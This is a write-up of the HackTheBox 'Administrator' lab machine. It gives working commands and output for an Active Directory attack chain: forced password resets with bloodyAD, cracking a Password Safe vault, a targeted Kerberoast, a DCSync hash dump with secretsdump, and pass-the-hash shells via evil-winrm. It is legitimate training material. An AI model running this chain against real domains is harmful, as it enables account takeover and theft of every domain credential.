HTB - Administrator
Administrator is a medium windows machine made to test Active Directory skills. It starts with credentials for a user that we can use to collect Bloodhound data for the domain. This will reveal that we can modify another user’s password which in turn can also modify a third user’s password. The last user grants us access to a FTP servers where a Password Safe database can be found and cracked. This reveals more passwords allowing to pivot to the next user. This new user has GenericWrite over another user. I’ll abuse this using a targeted kerberoast attack. The final stage involves using this last user to perform a DCSync attack to dump the administrator’s hash and finish compromising the domain.
Reconnaissance
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-14 03:46:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m02s
| smb2-time:
| date: 2025-02-14T03:46:45
|_ start_date: N/A
In this nmap result, we can see that there’s a DC named administrator.htb. We’ll add both DC and administrator.htb to our /etc/hosts. In addition to classic Windows domain controller services like Kerberos and LDAP, we also find a FTP service running.
Intitial credentials
HackTheBox provides the following message for the Administrator machine:
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
We can check whether these credentials work with some of the services of the box. We’ll start with SMB:
1
2
3
$ netexec smb 10.129.226.131 -u 'olivia' -p 'ichliebedich'
SMB 10.129.226.131 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.226.131 445 DC [+] administrator.htb\olivia:ichliebedich
The credentials don’t work for FTP:
1
2
$ netexec ftp 10.129.226.131 -u 'olivia' -p 'ichliebedich'
FTP 10.129.226.131 21 10.129.226.131 [-] olivia:ichliebedich (Response:530 User cannot log in, home directory inaccessible.)
FTP
In addition to the credentials we were given at the start, we can also try to log in anonymously.
1
2
3
4
5
6
7
8
$ ftp 10.129.226.131
Connected to 10.129.226.131.
220 Microsoft FTP Service
Name (10.129.226.131:kali): anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
No luck here, but we’ll probably come back to this service once we have other credentials.
SMB
Using olivia’s credentials, we can gather some information about the users:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ netexec smb 10.129.226.131 -u 'Olivia' -p 'ichliebedich' --users
SMB 10.129.226.131 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.226.131 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.226.131 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.226.131 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain
SMB 10.129.226.131 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.226.131 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account
SMB 10.129.226.131 445 DC olivia 2024-10-06 01:22:48 0
SMB 10.129.226.131 445 DC michael 2024-10-06 01:33:37 0
SMB 10.129.226.131 445 DC benjamin 2024-10-06 01:34:56 0
SMB 10.129.226.131 445 DC emily 2024-10-30 23:40:02 0
SMB 10.129.226.131 445 DC ethan 2024-10-12 20:52:14 0
SMB 10.129.226.131 445 DC alexander 2024-10-31 00:18:04 0
SMB 10.129.226.131 445 DC emma 2024-10-31 00:18:35 0
SMB 10.129.226.131 445 DC [*] Enumerated 10 local users: ADMINISTRATOR
We can also enumerate the shares:
1
2
3
4
5
6
7
8
9
10
11
$ netexec smb 10.129.226.131 -u 'Olivia' -p 'ichliebedich' --shares
SMB 10.129.226.131 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.226.131 445 DC [+] administrator.htb\Olivia:ichliebedich
SMB 10.129.226.131 445 DC [*] Enumerated shares
SMB 10.129.226.131 445 DC Share Permissions Remark
SMB 10.129.226.131 445 DC ----- ----------- ------
SMB 10.129.226.131 445 DC ADMIN$ Remote Admin
SMB 10.129.226.131 445 DC C$ Default share
SMB 10.129.226.131 445 DC IPC$ READ Remote IPC
SMB 10.129.226.131 445 DC NETLOGON READ Logon server share
SMB 10.129.226.131 445 DC SYSVOL READ Logon server share
The shares match the default ones for a domain controller. There’s not much more we can do here.
Bloodhound
We’ll use the bloodhound module of netexec to extract the AD data to get a grasp of the domain and what our current user can do or has access to.
1
2
3
4
5
6
$ netexec ldap 10.129.226.131 -u 'Olivia' -p 'ichliebedich' --dns-server 10.129.226.131 -d administrator.htb --bloodhound -c all
LDAP 10.129.226.131 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
LDAP 10.129.226.131 389 DC [+] administrator.htb\Olivia:ichliebedich
LDAP 10.129.226.131 389 DC Resolved collection methods: group, trusts, session, localadmin
LDAP 10.129.226.131 389 DC Done in 00M 01S
LDAP 10.129.226.131 389 DC Compressing output into /home/kali/.nxc/logs/DC_10.129.226.131_2025-02-13_215238_bloodhound.zip
Analyse bloodhound data
Focusing on Olivia, we can see that this user has GenericAll rights on michael: 
Olivia has GenericAll over Michael
It’s also interesting to note that the user michael is in the Remote Management Users group as well. This means that if we can get their creds, we can connect using Evil-WinRM.
Shell as michael
To take advantage of the GenericAll right with Olivia, there are multiple things we could do. Some examples:
- Set shadow credentials
- Perform a targeted kerberoast attack
- Change the user’s password
Setting shadow credentials wouldn’t work as the domain we’re attacking doesn’t have that type of authentication available. For the kerberoast attack, I tried it but unfortunately hashcat didn’t succeed to crack the hash.
The third option is to change the user’s password. From a linux, Bloodhound-CE recommends the net rpc command but I prefer using the bloodyAD tool for this. We’ll set a new password for the user michael: michael.
1
2
$ bloodyAD --host administrator.htb -d administrator.htb --dc-ip 10.129.226.131 -u olivia -p ichliebedich set password "michael" "michael"
[+] Password changed successfully!
Testing if the credentials now work to connect to winrm:
1
2
3
$ netexec winrm 10.129.226.131 -u michael -p 'michael'
WINRM 10.129.226.131 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.129.226.131 5985 DC [+] administrator.htb\michael:michael (Pwn3d!)
We can get a shell with these credentials but there’s not much we can find logged in as michael.
1
2
3
4
5
6
$ evil-winrm -i administrator.htb -u 'michael' -p 'michael'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents>
Authentication as benjamin
As Michael, we now have the rights to force change the password of user benjamin. 
Michael has ForceChangePassword over Benjamin
We’ll use bloodyAD again to change the password of the user benjamin to benjamin:
1
2
$ bloodyAD --host administrator.htb -d administrator.htb --dc-ip 10.129.226.131 -u michael -p michael set password "benjamin" "benjamin"
[+] Password changed successfully!
From Bloodhoud-ce, we also find that the user benjamin is part of an interesting group: Share moderators. The user is not part of the remote management group so we won’t be able to connect using winrm.
Testing if the new credentials work for SMB:
1
2
3
4
$ netexec smb 10.129.226.131 -u benjamin -p 'benjamin'
SMB 10.129.226.131 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.226.131 445 DC [+] administrator.htb\benjamin:benjamin
We can try to see if we have access to the ftp service:
1
2
$ netexec ftp administrator.htb -u benjamin -p benjamin
FTP 10.129.226.131 21 administrator.htb [+] benjamin:benjamin
Shell as emily
FTP
Connecting with benjamin’s credentials to the FTP service, we find only one file:
1
2
3
4
5
6
7
8
9
10
11
12
13
$ ftp 10.129.226.131
Connected to 10.129.226.131.
220 Microsoft FTP Service
Name (10.129.226.131:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||60887|)
125 Data connection already open; Transfer starting.
10-11-24 09:01PM 952 Backup.psafe3
226 Transfer complete.
We’ll download this file locally to inspect it:
1
2
3
4
5
6
7
8
9
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||60902|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************| 952 5.36 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (5.36 KiB/s)
Password Safe
The exension .psafe3 hints towards a pwsafe password manager. Trying to open it locally, we are asked for a password. We can use either john or hashcat to crack the password
john
Using pwsafe2john, we extracts a hash that we can later feed to john to crack it.
1
$ pwsafe2john Backup.psafe3 > hash
1
2
3
4
5
6
$ john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
hashcat
1
2
3
$ hashcat -m 5200 Backup.psafe3 /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
...[snip]...
Backup.psafe3:tekieromucho
Shell
Unlocking the safe with the password we uncovered, we get access to 3 entries:
- alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
- emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
- emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
Testing those credentials with netexec, we get a positive ping for emily:
1
2
3
$ netexec smb 10.129.226.131 -u users.txt -p passwords.txt
...[snip]...
SMB 10.129.226.131 445 DC [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Emily’s credentials also work for WinRM. We’ll connect using Evil-WinRM:
1
2
3
4
5
6
$ evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>
We can now grab the user flag:
1
2
*Evil-WinRM* PS C:\Users\emily\desktop> cat user.txt
1d5995f7************************
Authentication as ethan
Going back to Bloodhound-CE, we can see that emily has GenericWrite over the user ethan. 
Emily has GenericWrite over Ethan
Targeted Kerberoast
Using GenericWrite, we can use a Targeted Kerberoast attack. The idea of this attack is to request a ticket for a service using its SPN (A Service Principal Name is a unique identifier that associates a service instance with a service account in Kerberos) and then try cracking offline the password of said service. This only works if the password is weak.
Before running the kerberoast script, we need to set our clock right (Remeber that in the nmap scan, we had a 7h skew). Two ways of doing this:
1
2
$ sudo ntpdate administrator.htb
$ <script>
or
1
$ faketime -f +7h <script>
1
2
3
4
5
$ python targetedKerberoast.py -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --dc-ip 10.129.226.131 --request-user ethan
[*] Starting kerberoast attacks
[*] Fetching usernames from file
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$b6841a4e5951cfe3a8fef2ba580d9786$0f7614ec3616de2692d780e79903fcf40d2bc3d22e04198b14582278d0eedc43730e90876ef363df02c68b8449e0788dd3e625abfac13ffc42550c70d894dbed93746e91a5ee209d42a1626cecf8fc5ca685febb9b6e6399c75a01dd037b320fa54f18caf99fbe6374c6c9682683e613ed934363e8f45a4454a3dd7e1b074423bdc76081bf6926f289caeec95102e102687182f24a4b5821a5b7a12b657678fed3f0f04b7e608e15648c9d23d10687bf105b5890126929e004514ef580de302d6373cc19259e48eb79ee1e048267a8183bf0b006f3f0da89ce18e4a709768a2e4b37ea17b4fa6da8625ed2d3648f069f0c72fd6823ed6713b6f1644c7e5a5f2d8b02e0b67e49fe7ae3b69b0ed37d762c462a73bd5147e419f469f3944bed6cdbeb670e6cbb2c81f8e2b17d836d1c2bee890010e500555860c4bde04f79d03b86bc3f1e7b9ca989c5bea61e4c5c5947121f24c24d77264dc1115f1ddebd315a46d7538b302a45b88bca4eb051412400c5c70b90ddc359b284414d9cea34ad53e593b25b26285c3295911eeb4640c69eb969cc1833e8890f59f53f1eaa599c461c0b8818f000937033cee7243bf881a0a5b3108a0ef14a676e4973a254dc49e96cedcceb725d8ab8f9fe98126bb132c0d70cb97dc68c0885e9ad783f7c78729f2cca52e08a3445cd3fcd11a1514bbc97435dddcb8c8f4e605a2a358cfb6f5692d8bf0db520773dd1c1c26fe9c314731dde7d61a7ab9dd81de7be9f164ec6db95924c67714972f88faeeb57fe7dd916cb6030e0794ce28b08e3d29a606595344eefeb836d53e68e015ca8a30551e71821a70235fe5aea4c8e20e617e0b2026bba7d18fa7e2a1be37a95894b57534432b939e817ccb140ac99a2b19595b112a5e18316324da39b1373902854c38715fb9fe029baa9288f539a895b6e4390a31e954c5308e74d28156673e7eb82483e884da136095e2b715790b28469f0dd97b21609fdd8fb31ef42006978d2762d6a7ffb68df79aa4a6ad9b63d3e5d97a4b16df16cb19cee11ac40a9bb8632632c6a7e8c524f5699eef45de4586ebd3edf16f4f6c855d7007801a97e1ee9890b5cb1e8ce237d877c3bb4d8cd9e1a5eb7e44af3cf87d6da66a46a80fa071a664dbe508ac16b557caddbc4c5548be6915a5125b060f4736fa1c1aa04220661594861d656c0ee26716c4359c009aed11bcc9cbbd60a695e3b296664f69aa8e7d093891bc17d8e3636ca7ecbf1308ce61837dd561229c219a30fe4af482141163a92282e0da34fad1c79a84d495d176f55e49ece866aaa6a78f46a4e440172ce85bb4590d60c6dd007c42250a99c428451b13b8fe54132fbac88984048f9cb9dc6f55fdda2441ad8b228cc707f215e950a9a6b59c3d663408e0a174ea4e50bf9536062cc251494778c7762f4639f1720b0379a40b7ea78add48af14a4f7a85794d55983713a7e1098feebc514529635c17d7dc6d57b3c28dfe0a59d99254eb54578ba332d140a53638429c4f13e7b2ca2bd36ea45c38
Cracking this with hashcat (mode 13100) reveals ethan’s password limpbizkit:
1
2
3
$ hashcat ethan_hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
...[snip]...
$krb5tgs$23$*ethan$...:limpbizkit
Shell as administrator
In Bloodhound-CE, we can see that ethan has DCSync privileges over the domain: 
Ethan has DCSync privilege over administrator.htb
With this privilege, we can dump the hashes for the domain using Impacket’s secretsdump.py:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
$ python examples/secretsdump.py administrator.htb/ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0+20250206.100953.075f2b10 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:bb53a477af18526ada697ce2e51f76b3:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:a96ff145f7bed44fe462c575ae0f3577:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:5a67836f41cbf81bb895e038f24736d014b1a8e21b7a02d0f27311ea5165d182
administrator.htb\michael:aes128-cts-hmac-sha1-96:45f26e505610edfeb639d69babdc88d7
administrator.htb\michael:des-cbc-md5:1c08c867201a02f8
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:67cd41e233b05fa1390ea76602e1ed393a13879be72a2cfd72298bb32dc8c0ba
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:9f9ecd4fa7f833ce7fba54455e38fe6f
administrator.htb\benjamin:des-cbc-md5:c185d0c143b915c1
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
We can use the local administrator hash to get a shell using Evil-WinRM:
1
2
3
4
5
6
$ evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
We can now read the root flag:
1
2
*Evil-WinRM* PS C:\Users\Administrator\desktop> cat root.txt
97ad8ade************************